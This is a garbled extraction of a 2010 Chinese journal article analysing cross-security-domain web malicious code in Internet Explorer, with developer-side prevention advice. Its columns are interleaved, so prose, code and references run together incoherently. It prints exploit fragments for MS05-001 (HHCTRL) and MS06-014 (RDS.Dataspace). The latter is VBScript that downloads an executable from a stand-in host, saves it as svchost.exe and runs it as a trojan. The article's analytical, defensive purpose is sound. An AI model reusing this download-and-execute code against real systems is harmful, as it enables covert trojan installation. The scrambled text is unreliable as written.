网页恶意代码是木马用来传播的主要方式之一,各种有危害性的木马都可以做成网页恶意代码来传播危害用户,通过分析网页恶意代码的运行机理,对其中网页恶意代码实现跨安全域的方法进行深入探讨,分析跨域漏洞形成原因,从程序开发人员的角度给出跨域网页恶意代码的防范方法,为上网用户提供安全的网络环境。李志勇,薛亮,陶然,等:跨安仝域网页恶意代码运行机理与防范2010,46(21)137地运行权限将从远程主机下载的 icyfox. chm打开,而 icyfox. svchost. exe文件chm文件中打包了一个木马程序,并且在chm文件打开时自动setQ= df createobject( Shell. Application,"")"创建一个 Shell运行,由于是本地执行权限,因而将远程传送到客户端的木马Q. ShellExecute fname l,",","open",0运行木马程序激活Ipt(2)安全权限判定参数漏洞造成跨安全域通过对比补丁程序分析发现,老版本的 Microsoft mdac以 Internet Explorer Help ActiveX控件本地安全域绕过RDS.Dataspace ActiveX控件在执行 Createobject命令时是以漏洞(MS05-001)为例进行分析。远程攻击者可以利用这个漏本地执行权限来创建新对象,从而使得创建的 XMLHITTP对洞绕过本地安全域限制。利用MSIE帮助控件建恶意页面象、 ADOBD数据流对象、文件对象、Shl都具有本地文件的读诱使用户访问,可以导致绕过本地安全域检查,以高权限执行写和执行权限。任意脚本内容。测试代码如下类似上述跨站的还有 HHCTRL漏洞,HTML帮助 ActiveX4跨安全域网页恶意代码防范在大多数文献中都针对用户提出了许多安全防范措施,例如文献8给用户提出了若干建议来防范网页恶意代码的侵PARAM name="Item I' valuel'command c.WINDOWSP害,例如及时升级更新系统补丁,安装最新的杀毒软件,删除Health malware[l].htm">或卸载不必要或有漏洞的组件。然而要从漏洞产生的源头来解决跨域网页恶意代码则需注意以下几点:hhctrl.HHClick()(1)任何文件系统访问协议都要对来自网络的文件进行/script>安全域权限限制。这一措施的实现需要全程监视网络文件的这段远程代码利用该 nternet Explorer Help ActiveX控进入和被访问,强制网络进入的文件系统必须人工授权和许件来执行一个网页的内容,但是该控件对网页文件的执行权可后方能得到执行权限。4限是由 command参数所给的文件路径来判定的,这样攻击者(2)文件的权限不能仅靠路径来分配。要充分考虑对文将还有恶意代码的网页通过链接传到浏览器缓存空间后,再件调用的组件所被赋予的执行权限精确构造其本地全路径名,将该参数赋值给 command参数,从(3)权限要严格继承。由组件创建的新组件对象必须继而跨域执行本地计算机的脚本,黑客通过特定路径就可以以承其父组件所限定的权限,避免新对象越权执行操作。本地执行权限运行精心设计的网页恶意代码脚本,从而将木通过技术人员的不断努力和改进可以在程序的安全设计马程序激活。上进一步克服网络组件和程序的缺陷,给网终用户提供一个(3)控件创建新对象跨实全域更为安全的网络环境然而更为根本的是制定完善的法令、法以 Microsoft MDAC RDS Dataspace ActiveX控件远程代规严厉打击惩处网终中的犯罪,截断网终黑金的链路,这样没码执行漏洞(MS06014)为例进行分析。有网络黑色产业也就可以人人减少网络病毒木马的泛滥。script language="VBScript">on error resume next参考文献Set dfe= document. create Element(" object")'创建对象[1] Rabinovitch E. Protect your users against the latest Web-baseddf setAttribute"classid", "clsid BD96C556-65A3-11D0-983A-threat: Malicious code on caching servers.IEEE Communica00C04FC29E36tions Magazine, 2007, 45(3): 20-22Setx=dfCreateobject("Microsoftxmlhttp,")·创建一个[2]Zhugej,HolzT,Songc,eta!StudyingmaliciouswebsitesandXmlhttP对象the underground economy on the Chinese Web[c]/proc of 7thetss= df createobject((" ADODB. Stream","")"创建一个 ADOBDWorkshop on the Economics of Information Security(WEIS数据流对象08).Hanover, NH, 2008SS type-1类型XOpenGet,"htp:www.test.complexe",False"打开远程文3刘峰,李忐勇,陶然,等网络对抗M北京国防工业出版社,200[4] Lifeasageek.ms07-004 VMI. integer overflow exploit[ EB/OLI件,木马文件http://www.milworm.com/exploits/3137x Send发送5]江璜网页木马与跨域漏洞[电脑知识与技术,2006(1)set F-df. createobject("Scripting FileSystemObject", "")'EJxEX (61 Provos N, McNamee D, Mavrommatis P, et al. The ghost in the件对象browser: Analysis of Web-based malware[C //Proceedings of Hot-set tmp= F. GetSpecialFolder(2)‘获得文件夹Bots2007,2007ben7]朱明,徐骞,刘春明木马病毒分析及其检测方法研究计算机工enamel= E Buildpath(tmp," svchost.exe")木马保存为 svchost.exe程与应用,2003,39(28):198-200ss. write x, response Body"把远程文件写入数据流中[8] The Honeynet Project. Know your enemy: Malicious Web serSS savetofile flamel,2'把数据流存为文件并且是直接写到vers[eb/ol].(2007-08).hTtp://www.honeynet.org/papers/mws/.